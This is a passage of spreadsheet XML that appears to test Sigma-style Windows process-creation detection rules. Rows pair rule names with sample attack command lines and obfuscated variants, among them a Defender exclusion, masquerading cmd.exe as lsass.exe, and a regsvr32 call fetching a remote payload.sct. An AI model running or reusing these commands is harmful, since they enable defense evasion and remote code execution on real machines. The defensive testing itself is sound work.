      <c r="H148" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I148" s="43" t="n"/>
      <c r="J148" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K148" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="149" ht="15.75" customHeight="1" s="42">
      <c r="A149" s="36" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B149" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir</t>
        </is>
      </c>
      <c r="C149" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory</t>
        </is>
      </c>
      <c r="D149" s="36" t="inlineStr">
        <is>
          <t>fff9d2b7-e11c-4a69-93d3-40ef66189767</t>
        </is>
      </c>
      <c r="E149" s="36" t="inlineStr">
        <is>
          <t>"cmd.exe" /c cd /d %SystemRoot%\System32 &amp;&amp; copy cmd.exe %SystemRoot%\Temp\lsass.exe</t>
        </is>
      </c>
      <c r="F149" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G149" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H149" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I149" s="36" t="n"/>
      <c r="J149" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K149" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="150" ht="15.75" customHeight="1" s="42">
      <c r="A150" s="36" t="n"/>
      <c r="B150" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir_lolbin</t>
        </is>
      </c>
      <c r="C150" s="36" t="inlineStr">
        <is>
          <t>LOL-Binary Copied From System Directory</t>
        </is>
      </c>
      <c r="D150" s="36" t="inlineStr">
        <is>
          <t>f5d19838-41b5-476c-98d8-ba8af4929ee2</t>
        </is>
      </c>
      <c r="E150" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"NoP" -c "[System.IO.File]::Copy('C:\Windows\System32\rundll32.exe', 'C:\Temp\rundll32.exe')"</t>
        </is>
      </c>
      <c r="F150" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G150" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H150" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I150" s="43" t="n"/>
      <c r="J150" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K150" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="151" ht="15.75" customHeight="1" s="42">
      <c r="A151" s="36" t="n"/>
      <c r="B151" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir_lolbin</t>
        </is>
      </c>
      <c r="C151" s="36" t="inlineStr">
        <is>
          <t>LOL-Binary Copied From System Directory</t>
        </is>
      </c>
      <c r="D151" s="36" t="inlineStr">
        <is>
          <t>f5d19838-41b5-476c-98d8-ba8af4929ee2</t>
        </is>
      </c>
      <c r="E151" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"NoP" /"c" "[System.IO.File]::Copy('C:\Windows\System32\rundll32.exe', 'C:\Temp\rundll32.exe')"</t>
        </is>
      </c>
      <c r="F151" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G151" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H151" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I151" s="36" t="n"/>
      <c r="J151" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K151" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="152" ht="15.75" customHeight="1" s="42">
      <c r="A152" s="36" t="n"/>
      <c r="B152" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir_lolbin</t>
        </is>
      </c>
      <c r="C152" s="36" t="inlineStr">
        <is>
          <t>LOL-Binary Copied From System Directory</t>
        </is>
      </c>
      <c r="D152" s="36" t="inlineStr">
        <is>
          <t>f5d19838-41b5-476c-98d8-ba8af4929ee2</t>
        </is>
      </c>
      <c r="E152" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoP -"c" "[System.IO.File]::Copy('C:\Windows\System32\rundll32.exe', 'C:\Temp\rundll32.exe')"</t>
        </is>
      </c>
      <c r="F152" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G152" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H152" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I152" s="36" t="n"/>
      <c r="J152" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K152" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="153" ht="15.75" customHeight="1" s="42">
      <c r="A153" s="36" t="n"/>
      <c r="B153" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir_lolbin</t>
        </is>
      </c>
      <c r="C153" s="36" t="inlineStr">
        <is>
          <t>LOL-Binary Copied From System Directory</t>
        </is>
      </c>
      <c r="D153" s="36" t="inlineStr">
        <is>
          <t>f5d19838-41b5-476c-98d8-ba8af4929ee2</t>
        </is>
      </c>
      <c r="E153" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NOp -"c" "[System.IO.File]::Copy('C:\Windows\System32\rundll32.exe', 'C:\Temp\rundll32.exe')"</t>
        </is>
      </c>
      <c r="F153" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G153" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H153" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I153" s="36" t="n"/>
      <c r="J153" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K153" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="154" ht="15.75" customHeight="1" s="42">
      <c r="A154" s="36" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B154" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C154" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D154" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E154" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F154" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G154" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H154" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I154" s="43" t="n"/>
      <c r="J154" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K154" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="155" ht="15.75" customHeight="1" s="42">
      <c r="A155" s="36" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B155" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C155" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D155" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E155" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F155" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G155" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H155" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I155" s="36" t="n"/>
      <c r="J155" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K155" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="156" ht="15.75" customHeight="1" s="42">
      <c r="A156" s="36" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B156" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C156" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D156" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E156" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F156" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G156" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H156" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I156" s="36" t="n"/>
      <c r="J156" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K156" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="157" ht="15.75" customHeight="1" s="42">
      <c r="A157" s="36" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B157" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C157" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D157" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E157" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %USERPROFILE%\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F157" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G157" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H157" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I157" s="36" t="n"/>
      <c r="J157" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K157" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="158" ht="15.75" customHeight="1" s="42">
      <c r="A158" s="43" t="n"/>
      <c r="B158" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C158" s="36" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D158" s="36" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E158" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F158" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G158" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H158" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I158" s="36" t="n"/>
      <c r="J158" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K158" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="159" ht="15.75" customHeight="1" s="42">
      <c r="A159" s="43" t="n"/>
      <c r="B159" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C159" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D159" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E159" s="36" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /node:localhost process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F159" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G159" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H159" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I159" s="43" t="n"/>
      <c r="J159" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K159" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="160" ht="15.75" customHeight="1" s="42">
      <c r="A160" s="43" t="n"/>
      <c r="B160" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C160" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D160" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E160" s="36" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe -"node:localhost" process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F160" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G160" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H160" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I160" s="36" t="n"/>
      <c r="J160" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K160" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="161" ht="15.75" customHeight="1" s="42">
      <c r="A161" s="43" t="n"/>
      <c r="B161" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C161" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D161" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E161" s="36" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /"node:localhost" process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F161" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G161" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H161" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I161" s="36" t="n"/>
      <c r="J161" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K161" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="162" ht="15.75" customHeight="1" s="42">
      <c r="A162" s="43" t="n"/>
      <c r="B162" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C162" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D162" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E162" s="36" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /nOdE:lOcalHoST process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F162" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G162" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H162" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I162" s="36" t="n"/>
      <c r="J162" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K162" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="163" ht="15.75" customHeight="1" s="42">
      <c r="A163" s="43" t="n"/>
      <c r="B163" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C163" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D163" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E163" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F163" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G163" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H163" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I163" s="43" t="n"/>
      <c r="J163" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K163" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="164" ht="15.75" customHeight="1" s="42">
      <c r="A164" s="43" t="n"/>
      <c r="B164" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C164" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D164" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E164" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F164" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G164" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H164" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I164" s="43" t="n"/>
      <c r="J164" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K164" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="165" ht="15.75" customHeight="1" s="42">
      <c r="A165" s="43" t="n"/>
      <c r="B165" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C165" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D165" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E165" s="36" t="inlineStr">
        <is>
          <t>powershell -Nop -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F165" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G165" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H165" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I165" s="43" t="n"/>
      <c r="J165" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K165" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="166" ht="15.75" customHeight="1" s="42">
      <c r="A166" s="43" t="n"/>
      <c r="B166" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C166" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D166" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E166" s="36" t="inlineStr">
        <is>
          <t>powershell /"nop" -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F166" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G166" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H166" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I166" s="43" t="n"/>
      <c r="J166" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K166" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="167" ht="15.75" customHeight="1" s="42">
      <c r="A167" s="43" t="n"/>
      <c r="B167" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C167" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D167" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E167" s="36" t="inlineStr">
        <is>
          <t>powershell -"nop" -c "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F167" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G167" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H167" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I167" s="43" t="n"/>
      <c r="J167" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K167" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="168" ht="15.75" customHeight="1" s="42">
      <c r="A168" s="43" t="n"/>
      <c r="B168" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C168" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D168" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E168" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfile /"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F168" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G168" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H168" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I168" s="43" t="n"/>
      <c r="J168" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K168" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="169" ht="15.75" customHeight="1" s="42">
      <c r="A169" s="43" t="n"/>
      <c r="B169" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C169" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D169" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E169" s="36" t="inlineStr">
        <is>
          <t>powershell -"nop" /"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F169" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G169" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H169" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I169" s="43" t="n"/>
      <c r="J169" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K169" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="170" ht="15.75" customHeight="1" s="42">
      <c r="A170" s="43" t="n"/>
      <c r="B170" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C170" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D170" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E170" s="36" t="inlineStr">
        <is>
          <t>powershell -"nop" -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F170" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G170" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H170" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I170" s="43" t="n"/>
      <c r="J170" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K170" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="171" ht="15.75" customHeight="1" s="42">
      <c r="A171" s="43" t="n"/>
      <c r="B171" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C171" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D171" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E171" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F171" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G171" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H171" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I171" s="43" t="n"/>
      <c r="J171" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K171" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="172" ht="15.75" customHeight="1" s="42">
      <c r="A172" s="43" t="n"/>
      <c r="B172" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C172" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D172" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E172" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F172" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G172" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H172" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I172" s="43" t="n"/>
      <c r="J172" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K172" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="173" ht="15.75" customHeight="1" s="42">
      <c r="A173" s="43" t="n"/>
      <c r="B173" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C173" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D173" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E173" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F173" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G173" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H173" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I173" s="43" t="n"/>
      <c r="J173" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K173" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="174" ht="15.75" customHeight="1" s="42">
      <c r="A174" s="43" t="n"/>
      <c r="B174" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C174" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D174" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E174" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //e:jSCRiPt -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F174" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G174" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H174" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I174" s="43" t="n"/>
      <c r="J174" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K174" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="175" ht="15.75" customHeight="1" s="42">
      <c r="A175" s="43" t="n"/>
      <c r="B175" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C175" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D175" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E175" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //nolOgO C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F175" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G175" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H175" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I175" s="43" t="n"/>
      <c r="J175" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K175" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="176" ht="15.75" customHeight="1" s="42">
      <c r="A176" s="43" t="n"/>
      <c r="B176" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C176" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D176" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E176" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /C set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F176" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G176" s="36" t="b">
        <v>0</v>
      </c>
